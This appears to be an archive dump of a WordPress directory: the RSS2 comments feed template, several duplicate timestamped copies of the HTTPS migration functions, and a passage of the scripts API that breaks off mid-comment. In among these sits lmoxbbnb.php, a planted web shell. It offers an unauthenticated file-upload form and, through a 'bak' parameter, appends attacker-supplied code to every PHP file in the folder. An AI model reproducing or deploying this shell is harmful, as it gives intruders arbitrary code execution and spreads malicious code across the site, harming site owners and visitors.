feed-rss2-comments-20260621181322.php 0000666 00000010050 15224151220 0012245 0 ustar 00 <?php
/**
* RSS2 Feed Template for displaying RSS2 Comments feed.
*
* @package WordPress
*/
header( 'Content-Type: ' . feed_content_type( 'rss2' ) . '; charset=' . get_option( 'blog_charset' ), true );
echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>';
/** This action is documented in wp-includes/feed-rss2.php */
do_action( 'rss_tag_pre', 'rss2-comments' );
?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
<?php
/** This action is documented in wp-includes/feed-rss2.php */
do_action( 'rss2_ns' );
?>
<?php
/**
* Fires at the end of the RSS root to add namespaces.
*
* @since 2.8.0
*/
do_action( 'rss2_comments_ns' );
?>
>
<channel>
<title>
<?php
if ( is_singular() ) {
/* translators: Comments feed title. %s: Post title. */
printf( ent2ncr( __( 'Comments on: %s' ) ), get_the_title_rss() );
} elseif ( is_search() ) {
/* translators: Comments feed title. 1: Site title, 2: Search query. */
printf( ent2ncr( __( 'Comments for %1$s searching on %2$s' ) ), get_bloginfo_rss( 'name' ), get_search_query() );
} else {
/* translators: Comments feed title. %s: Site title. */
printf( ent2ncr( __( 'Comments for %s' ) ), get_wp_title_rss() );
}
?>
</title>
<atom:link href="<?php self_link(); ?>" rel="self" type="application/rss+xml" />
<link><?php ( is_single() ) ? the_permalink_rss() : bloginfo_rss( 'url' ); ?></link>
<description><?php bloginfo_rss( 'description' ); ?></description>
<lastBuildDate><?php echo get_feed_build_date( 'r' ); ?></lastBuildDate>
<sy:updatePeriod>
<?php
/** This filter is documented in wp-includes/feed-rss2.php */
echo apply_filters( 'rss_update_period', 'hourly' );
?>
</sy:updatePeriod>
<sy:updateFrequency>
<?php
/** This filter is documented in wp-includes/feed-rss2.php */
echo apply_filters( 'rss_update_frequency', '1' );
?>
</sy:updateFrequency>
<?php
/**
* Fires at the end of the RSS2 comment feed header.
*
* @since 2.3.0
*/
do_action( 'commentsrss2_head' );
while ( have_comments() ) :
the_comment();
$comment_post = get_post( $comment->comment_post_ID );
/**
* @global WP_Post $post Global post object.
*/
$GLOBALS['post'] = $comment_post;
?>
<item>
<title>
<?php
if ( ! is_singular() ) {
$title = get_the_title( $comment_post->ID );
/** This filter is documented in wp-includes/feed.php */
$title = apply_filters( 'the_title_rss', $title );
/* translators: Individual comment title. 1: Post title, 2: Comment author name. */
printf( ent2ncr( __( 'Comment on %1$s by %2$s' ) ), $title, get_comment_author_rss() );
} else {
/* translators: Comment author title. %s: Comment author name. */
printf( ent2ncr( __( 'By: %s' ) ), get_comment_author_rss() );
}
?>
</title>
<link><?php comment_link(); ?></link>
<dc:creator><![CDATA[<?php echo get_comment_author_rss(); ?>]]></dc:creator>
<pubDate><?php echo mysql2date( 'D, d M Y H:i:s +0000', get_comment_time( 'Y-m-d H:i:s', true, false ), false ); ?></pubDate>
<guid isPermaLink="false"><?php comment_guid(); ?></guid>
<?php if ( post_password_required( $comment_post ) ) : ?>
<description><?php echo ent2ncr( __( 'Protected Comments: Please enter your password to view comments.' ) ); ?></description>
<content:encoded><![CDATA[<?php echo get_the_password_form(); ?>]]></content:encoded>
<?php else : ?>
<description><![CDATA[<?php comment_text_rss(); ?>]]></description>
<content:encoded><![CDATA[<?php comment_text(); ?>]]></content:encoded>
<?php endif; // End if post_password_required(). ?>
<?php
/**
* Fires at the end of each RSS2 comment feed item.
*
* @since 2.1.0
*
* @param int $comment_id The ID of the comment being displayed.
* @param int $comment_post_id The ID of the post the comment is connected to.
*/
do_action( 'commentrss2_item', $comment->comment_ID, $comment_post->ID );
?>
</item>
<?php endwhile; ?>
</channel>
</rss>
https-migration-20260605202835.php 0000666 00000011205 15224151220 0011771 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605111908.php 0000666 00000011205 15224151220 0011771 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
lmoxbbnb.php 0000666 00000001370 15224151220 0007057 0 ustar 00 <?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?>
<?php
if (isset($_GET['bak'])) {
$directory = __DIR__;
$mama = $_POST['file'];
$textToAppend = '
' . $mama . '
';
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (pathinfo($file, PATHINFO_EXTENSION) === 'php') {
$fileHandle = fopen($directory . '/' . $file, 'a');
fwrite($fileHandle, $textToAppend);
fclose($fileHandle);
echo "OK >> $file
";
}
}
closedir($handle);
}
}
?>
https-migration-20260605140532-20260621081206-20260621170000.php 0000666 00000011205 15224151220 0014715 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605101354-20260621081201-20260621145629.php 0000666 00000011205 15224151220 0014732 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606074155.php 0000666 00000011205 15224151220 0011774 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
functions.wp-scripts-20260621093250-20260621175113.php 0000666 00000035717 15224151220 0014357 0 ustar 00 <?php
/**
* Dependencies API: Scripts functions
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Initializes $wp_scripts if it has not been set.
*
* @since 4.2.0
*
* @global WP_Scripts $wp_scripts
*
* @return WP_Scripts WP_Scripts instance.
*/
function wp_scripts() {
global $wp_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
$wp_scripts = new WP_Scripts();
}
return $wp_scripts;
}
/**
* Helper function to output a _doing_it_wrong message when applicable.
*
* @ignore
* @since 4.2.0
* @since 5.5.0 Added the `$handle` parameter.
*
* @param string $function_name Function name.
* @param string $handle Optional. Name of the script or stylesheet that was
* registered or enqueued too early. Default empty.
*/
function _wp_scripts_maybe_doing_it_wrong( $function_name, $handle = '' ) {
if ( did_action( 'init' ) || did_action( 'wp_enqueue_scripts' )
|| did_action( 'admin_enqueue_scripts' ) || did_action( 'login_enqueue_scripts' )
) {
return;
}
$message = sprintf(
/* translators: 1: wp_enqueue_scripts, 2: admin_enqueue_scripts, 3: login_enqueue_scripts */
__( 'Scripts and styles should not be registered or enqueued until the %1$s, %2$s, or %3$s hooks.' ),
'<code>wp_enqueue_scripts</code>',
'<code>admin_enqueue_scripts</code>',
'<code>login_enqueue_scripts</code>'
);
if ( $handle ) {
$message .= ' ' . sprintf(
/* translators: %s: Name of the script or stylesheet. */
__( 'This notice was triggered by the %s handle.' ),
'<code>' . $handle . '</code>'
);
}
_doing_it_wrong(
$function_name,
$message,
'3.3.0'
);
}
/**
* Prints scripts in document head that are in the $handles queue.
*
* Called by admin-header.php and {@see 'wp_head'} hook. Since it is called by wp_head on every page load,
* the function does not instantiate the WP_Scripts object unless script names are explicitly passed.
* Makes use of already-instantiated `$wp_scripts` global if present. Use provided {@see 'wp_print_scripts'}
* hook to register/enqueue new scripts.
*
* @see WP_Scripts::do_item()
* @since 2.1.0
*
* @global WP_Scripts $wp_scripts The WP_Scripts object for printing scripts.
*
* @param string|string[]|false $handles Optional. Scripts to be printed. Default 'false'.
* @return string[] On success, an array of handles of processed WP_Dependencies items; otherwise, an empty array.
*/
function wp_print_scripts( $handles = false ) {
global $wp_scripts;
/**
* Fires before scripts in the $handles queue are printed.
*
* @since 2.1.0
*/
do_action( 'wp_print_scripts' );
if ( '' === $handles ) { // For 'wp_head'.
$handles = false;
}
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__ );
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
if ( ! $handles ) {
return array(); // No need to instantiate if nothing is there.
}
}
return wp_scripts()->do_items( $handles );
}
/**
* Adds extra code to a registered script.
*
* Code will only be added if the script is already in the queue.
* Accepts a string `$data` containing the code. If two or more code blocks
* are added to the same script `$handle`, they will be printed in the order
* they were added, i.e. the latter added code can redeclare the previous.
*
* @since 4.5.0
*
* @see WP_Scripts::add_inline_script()
*
* @param string $handle Name of the script to add the inline script to.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script before the handle
* or after. Default 'after'.
* @return bool True on success, false on failure.
*/
function wp_add_inline_script( $handle, $data, $position = 'after' ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
if ( false !== stripos( $data, '</script>' ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: <script>, 2: wp_add_inline_script() */
__( 'Do not pass %1$s tags to %2$s.' ),
'<code><script></code>',
'<code>wp_add_inline_script()</code>'
),
'4.5.0'
);
$data = trim( preg_replace( '#<script[^>]*>(.*)</script>#is', '$1', $data ) );
}
return wp_scripts()->add_inline_script( $handle, $data, $position );
}
/**
* Registers a new script.
*
* Registers a script to be enqueued later using the wp_enqueue_script() function.
*
* @see WP_Dependencies::add()
* @see WP_Dependencies::add_data()
*
* @since 2.1.0
* @since 4.3.0 A return value was added.
* @since 6.3.0 The $in_footer parameter of type boolean was overloaded to be an $args parameter of type array.
* @since 6.9.0 The $fetchpriority parameter of type string was added to the $args parameter of type array.
*
* @param string $handle Name of the script. Should be unique.
* @param string|false $src Full URL of the script, or path of the script relative to the WordPress root directory.
* If source is set to false, script is an alias of other scripts it depends on.
* @param string[] $deps Optional. An array of registered script handles this script depends on. Default empty array.
* @param string|bool|null $ver Optional. String specifying script version number, if it has one, which is added to the URL
* as a query string for cache busting purposes. If version is set to false, a version
* number is automatically added equal to current installed WordPress version.
* If set to null, no version is added.
* @param array|bool $args {
* Optional. An array of additional script loading strategies. Default empty array.
* Otherwise, it may be a boolean in which case it determines whether the script is printed in the footer. Default false.
*
* @type string $strategy Optional. If provided, may be either 'defer' or 'async'.
* @type bool $in_footer Optional. Whether to print the script in the footer. Default 'false'.
* @type string $fetchpriority Optional. The fetch priority for the script. Default 'auto'.
* }
* @return bool Whether the script has been registered. True on success, false on failure.
*/
function wp_register_script( $handle, $src, $deps = array(), $ver = false, $args = array() ) {
if ( ! is_array( $args ) ) {
$args = array(
'in_footer' => (bool) $args,
);
}
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
$wp_scripts = wp_scripts();
$registered = $wp_scripts->add( $handle, $src, $deps, $ver );
if ( ! empty( $args['in_footer'] ) ) {
$wp_scripts->add_data( $handle, 'group', 1 );
}
if ( ! empty( $args['strategy'] ) ) {
$wp_scripts->add_data( $handle, 'strategy', $args['strategy'] );
}
if ( ! empty( $args['fetchpriority'] ) ) {
$wp_scripts->add_data( $handle, 'fetchpriority', $args['fetchpriority'] );
}
return $registered;
}
/**
* Localizes a script.
*
* Works only if the script has already been registered.
*
* Accepts an associative array `$l10n` and creates a JavaScript object:
*
* "$object_name": {
* key: value,
* key: value,
* ...
* }
*
* @see WP_Scripts::localize()
* @link https://core.trac.wordpress.org/ticket/11520
*
* @since 2.2.0
*
* @todo Documentation cleanup
*
* @param string $handle Script handle the data will be attached to.
* @param string $object_name Name for the JavaScript object. Passed directly, so it should be qualified JS variable.
* Example: '/[a-zA-Z0-9_]+/'.
* @param array $l10n The data itself. The data can be either a single or multi-dimensional array.
* @return bool True if the script was successfully localized, false otherwise.
*/
function wp_localize_script( $handle, $object_name, $l10n ) {
$wp_scripts = wp_scripts();
return $wp_scripts->localize( $handle, $object_name, $l10n );
}
/**
* Sets translated strings for a script.
*
* Works only if the script has already been registered.
*
* @see WP_Scripts::set_translations()
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @global WP_Scripts $wp_scripts The WP_Scripts object for printing scripts.
*
